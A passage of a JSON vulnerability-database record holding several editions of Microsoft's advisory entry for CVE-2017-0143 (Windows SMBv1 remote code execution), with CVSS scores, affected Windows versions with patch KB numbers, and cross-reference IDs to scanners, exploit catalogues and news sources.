"privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-06T12:49:42", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-06T12:49:42", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-06T12:49:42", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3212646", "KB4012217", "KB3177186", "KB3205409", "KB3210720", "KB4012213", "KB3210721", "KB3205401", "KB4012212", "KB3213986", "KB4012214", "KB4012598", "KB4012216", "KB4013198", "KB4013429", "KB4012215", "KB4012606", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T12:49:42", "differentElements": ["msAffectedSoftware"], "edition": 16}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-06T16:54:11", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-06T16:54:11", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-06T16:54:11", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB4013429", "KB4012213", "KB4012217", "KB4012216", "KB4012214", "KB3210721", "KB3213986", "KBMS16-110, 3187754", "KB3177186", "KB4013198", "KB4012606", "KB3210720", "KB4012212", "KB3212646", "KB3205401", "KB4012598", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T16:54:11", "differentElements": ["msAffectedSoftware"], "edition": 17}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-06T18:45:07", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "rapid7community", "idList": 